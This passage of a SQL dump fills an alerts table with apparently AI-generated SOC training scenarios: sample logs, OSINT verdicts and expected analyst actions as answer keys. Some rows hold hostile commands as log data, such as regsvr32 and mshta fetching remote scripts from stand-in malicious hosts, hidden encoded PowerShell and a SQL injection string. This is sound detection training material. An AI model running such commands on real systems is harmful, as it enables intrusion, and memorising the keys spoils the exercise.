patterns but verified as a legitimate update.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'),
(658, 'False Positive: Unusual Login Time', 'medium', 'SIEM', 'A login event occurred at an unusual time for the user, but investigation revealed it was a legitimate access.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T05:10:10Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.1.70\",\"dst_ip\":\"\",\"username\":\"mjohnson\",\"hostname\":\"workstation-04\",\"failed_attempts\":0}', '2026-01-11 03:18:55', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mjohnson\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Employee account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was initially flagged due to the time but was confirmed as legitimate after user verification.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'),
(659, 'False Positive: High Volume Web Traffic', 'low', 'Firewall', 'An alert was triggered for high volume web traffic, which was determined to be legitimate business activity.', 'Web Attack', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T06:45:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.80\",\"dst_ip\":\"203.0.113.200\",\"username\":\"\",\"hostname\":\"\",\"domain\":\"business-partner.com\"}', '2026-01-09 15:07:34', '2026-01-11 14:55:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Trusted partner domain with no security issues\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of a business unit\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"business-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate business partner domain\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The traffic volume was high due to a scheduled data exchange with a business partner.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'),
(660, 'Suspicious PowerShell Command with Encoded Payload', 'high', 'Splunk', 'A PowerShell script was executed using an encoded command, indicating possible obfuscation tactics.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.12\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jdoe\",\"hostname\":\"CORP-WIN12\",\"command_line\":\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\"}', '2026-01-09 15:31:43', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are often used for obfuscation by malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands are a known indicator of malicious activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS');
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(661, 'Multiple Failed Login Attempts Detected', 'medium', 'Wazuh', 'A foreign IP address attempted to log in 23 times unsuccessfully, indicating a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.25\",\"username\":\"administrator\",\"hostname\":\"DC01\",\"failed_attempts\":23}', '2026-01-10 14:02:12', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common target for brute force attacks.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Frequent failed login attempts from a known malicious IP indicates a brute force attack.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS'),
(662, 'Malicious Email with Phishing URL Detected', 'critical', 'Proofpoint', 'An email containing a known phishing URL was received, potentially targeting user credentials.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"email_sender\":\"no-reply@securebank.com\",\"username\":\"asmith\",\"hostname\":\"MAIL-SERVER\",\"url\":\"http://securebank-login.com\"}', '2026-01-11 10:11:51', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://securebank-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Phishing URL attempting to steal banking credentials.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@securebank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Spoofed domain resembling legitimate bank.\"}}],\"expected_actions\":[\"block_url\",\"notify_user\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Phishing URL detected in email, posing a threat to user credentials.\"}', 'Advanced', 'SIEM', 7, 1, 'FINANCE'),
(663, 'Lateral Movement via PSExec Detected', 'high', 'CrowdStrike', 'Suspicious PSExec activity detected, indicating potential lateral movement within the network.', 'Lateral Movement', 'T1569.002', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.15\",\"dst_ip\":\"10.0.1.20\",\"username\":\"svc_admin\",\"hostname\":\"SRV-APP01\",\"command_line\":\"psexec.exe \\\\\\\\10.0.1.20 -u svc_admin -p ******** -c cmd.exe\"}', '2026-01-10 21:33:29', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.1.20 -u svc_admin -p ******** -c cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"PSExec usage detected, commonly used for lateral movement by attackers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec usage from internal to internal IPs suggests lateral movement.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'),
(664, 'SQL Injection Attempt on Public Web Application', 'high', 'IDS/IPS', 'A potential SQL injection attack was detected targeting the login page of a public web application.', 'Web Attack', 'T1505', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T17:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"192.168.1.30\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"url\":\"http://webapp.local/login\"}', '2026-01-10 00:59:01', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple web-based attacks.\"}}],\"expected_actions\":[\"block_ip\",\"monitor_application\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"SQL injection attempt detected via suspicious payload on login page.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS'),
(665, 'Data Exfiltration Detected via Suspicious Network Connection', 'critical', 'Firewall', 'A large amount of data was transferred to an external IP, indicating potential data exfiltration.', 'Data Exfil', 'T1048', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T18:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.2.14\",\"dst_ip\":\"198.51.100.75\",\"username\":\"nmartin\",\"hostname\":\"FILE-SRV01\",\"data_volume\":\"1.5GB\"}', '2026-01-10 00:24:48', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for numerous data exfiltration incidents.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious data transfer.\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unusual data volume transferred to a known malicious IP suggests data exfiltration.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS'),
(666, 'False Positive: Legitimate Certutil Activity Misclassified as Malicious', 'medium', 'SIEM', 'Certutil was executed on a user machine, typically flagged for potential malware download, but verified as a legitimate use case.', 'Malware', 'T1218.010', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T19:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.3.18\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jane.smith\",\"hostname\":\"HR-WORKSTATION\",\"command_line\":\"certutil.exe -addstore MyCompanyCert\"}', '2026-01-10 06:39:03', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"certutil.exe -addstore MyCompanyCert\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"This use of certutil is legitimate as part of company policy.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.3.18\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Certutil activity verified as legitimate based on internal policy use case.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL'),
(667, 'Suspicious Regsvr32 Execution Detected', 'high', 'EDR', 'Regsvr32 was executed with a suspicious scriptlet URL, typical of a fileless malware attack.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T20:05:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.4.22\",\"dst_ip\":\"192.168.1.11\",\"username\":\"mroberts\",\"hostname\":\"DESKTOP-ROBERTS\",\"command_line\":\"regsvr32.exe /s /u /i:http://malicious.site/script.sct scrobj.dll\"}', '2026-01-10 11:54:15', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /u /i:http://malicious.site/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Regsvr32 with URL pointing to a known malicious site.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.4.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Regsvr32 execution with external scriptlet URL suggests fileless malware activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'),
(668, 'False Positive: Legitimate Application Misidentified as Malware', 'medium', 'EDR', 'A legitimate application was flagged as suspicious due to anomalous behavior, but verified as a false positive.', 'Malware', 'T1204.002', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T21:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.5.25\",\"dst_ip\":\"192.168.1.12\",\"username\":\"kclark\",\"hostname\":\"FINANCE-PC\",\"command_line\":\"C:\\\\Program Files\\\\LegitApp\\\\update.exe\"}', '2026-01-10 14:40:07', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\LegitApp\\\\update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"The application is verified as legitimate and safe.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The flagged application was verified as legitimate and safe, confirming a false positive.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'),
(669, 'Unauthorized Access Attempt on Database Server', 'high', 'SIEM', 'A potentially unauthorized access attempt was detected on a critical database server from an internal IP.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T22:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.6.33\",\"dst_ip\":\"192.168.1.13\",\"username\":\"dba_admin\",\"hostname\":\"DB-SERVER\",\"failed_attempts\":15}', '2026-01-10 10:37:44', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.6.33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address attempting unauthorized access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"dba_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common target for unauthorized access attempts.\"}}],\"expected_actions\":[\"reset_credentials\",\"monitor_user_activity\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Multiple failed login attempts indicate potential unauthorized access.\"}', 'Advanced', 'SIEM', 7, 1, 'TECH'),
(670, 'False Positive: Misinterpreted Network Activity as Data Exfiltration', 'medium', 'Firewall', 'Network activity flagged as potential data exfiltration was verified to be a legitimate backup process.', 'Data Exfil', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T23:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.7.44\",\"dst_ip\":\"192.168.1.14\",\"username\":\"backup.svc\",\"hostname\":\"BACKUP-SERVER\",\"data_volume\":\"2.0GB\"}', '2026-01-10 09:03:09', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.7.44\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address engaged in backup process.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup.svc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Service account used for legitimate backup operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Network activity verified as legitimate backup process, confirming a false positive.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS'),
(671, 'Suspicious Mshta Execution with Malicious Script', 'critical', 'EDR', 'Mshta was executed with a malicious remote script, indicating a potential fileless malware attack.', 'Malware', 'T1218.005', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T23:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.8.55\",\"dst_ip\":\"192.168.1.15\",\"username\":\"tjohnson\",\"hostname\":\"WORKSTATION-TJ\",\"command_line\":\"mshta http://malicious-site.com/malicious-script.hta\"}', '2026-01-10 20:15:05', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mshta http://malicious-site.com/malicious-script.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Execution of a remote HTA script, typical of fileless malware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.8.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Mshta execution with external script URL suggests fileless malware activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'),
(672, 'Suspicious Network Connection Detected from Internal to External Host', 'high', 'CrowdStrike', 'A connection attempt was detected from an internal host to a known malicious IP address used for command and control.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.42\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"command_line\":\"powershell.exe -encodedcommand SGVsbG8gd29ybGQ=\",\"domain\":\"malicious-site.com\"}', '2026-01-11 03:07:07', '2026-01-11 14:57:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command and control activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-site.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The connection to a known malicious IP indicates a true positive for malware communication.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(673, 'Multiple Failed Login Attempts Detected from Foreign IP', 'medium', 'Wazuh', 'A foreign IP address has attempted to login into the corporate VPN with multiple failed attempts, indicating a possible brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:00:15Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.199.108.153\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"vpn-server\",\"failed_attempts\":25}', '2026-01-10 22:06:55', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for multiple brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the VPN server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The volume and origin of failed login attempts suggest a brute force attack.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'),
(674, 'APT Command and Control Communication via Discord', 'critical', 'Splunk', 'Detected command and control traffic using Discord\'s infrastructure, commonly used by APT groups for stealthy communications.', 'Data Exfiltration', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:25:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.50.5\",\"dst_ip\":\"162.159.138.233\",\"username\":\"alice\",\"hostname\":\"laptop-23\",\"url\":\"https://discordapp.com/api/v9/channels/1234567890/messages\"}', '2026-01-11 12:40:32', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"162.159.138.233\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with Discord C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.50.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://discordapp.com/api/v9/channels/1234567890/messages\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Discord API endpoint used for stealthy data exfiltration\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of Discord for C2 traffic is indicative of advanced threat activity.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS'),
(675, 'Phishing Attempt via Spoofed Domain', 'high', 'Proofpoint', 'A phishing email was sent to an employee with a spoofed domain mimicking a legitimate service to steal credentials.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.100\",\"dst_ip\":\"192.168.1.20\",\"username\":\"bsmith\",\"hostname\":\"mail-server\",\"email_sender\":\"support@microsfot.com\",\"url\":\"http://fake-login.microsoft.com\"}', '2026-01-10 19:17:54', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@microsfot.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email address known for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fake-login.microsoft.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL used for harvesting credentials\"}}],\"expected_actions\":[\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are indicative of a phishing attempt to harvest credentials.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'),
(676, 'Detected Fileless Malware Execution', 'critical', 'EDR', 'A fileless malware was executed in memory using PowerShell, evading traditional file-based detection mechanisms.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:05:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.100.15\",\"dst_ip\":\"192.168.100.15\",\"username\":\"jsmith\",\"hostname\":\"desktop-12\",\"command_line\":\"powershell.exe -nop -w hidden -enc JABQAGkATwB1AG4ARABjAGUATQBzAGcA\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 11:56:38', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc JABQAGkATwB1AG4ARABjAGUATQBzAGcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command for fileless malware execution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No associated file, possible fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell for in-memory execution indicates advanced evasion tactics.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(677, 'Suspicious DNS Queries to DGA Domain', 'high', 'Firewall', 'Detected multiple DNS queries to a domain generated by a domain generation algorithm (DGA), often used for botnet communications.', 'Malware', 'T1568', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:50:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.10.25\",\"dst_ip\":\"198.51.100.50\",\"username\":\"tadmin\",\"hostname\":\"office-pc\",\"domain\":\"a1b2c3d4e5f6g7h8.com\"}', '2026-01-09 22:50:34', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"a1b2c3d4e5f6g7h8.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with DGA botnet activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the querying host\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of DGA domains in DNS queries suggests botnet communication.\"}', 'Expert', 'MAL', 9, 1, 'GOVERNMENT'),
(678, 'Web Attack: SQL Injection Attempt Detected', 'high', 'IDS/IPS', 'An attacker attempted an SQL injection attack on the corporate web application, potentially exploiting vulnerabilities to exfiltrate data.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:20:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.100\",\"username\":\"guest\",\"hostname\":\"web-server\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-09 20:58:06', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body indicates a classic SQL injection attempt, warranting investigation.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
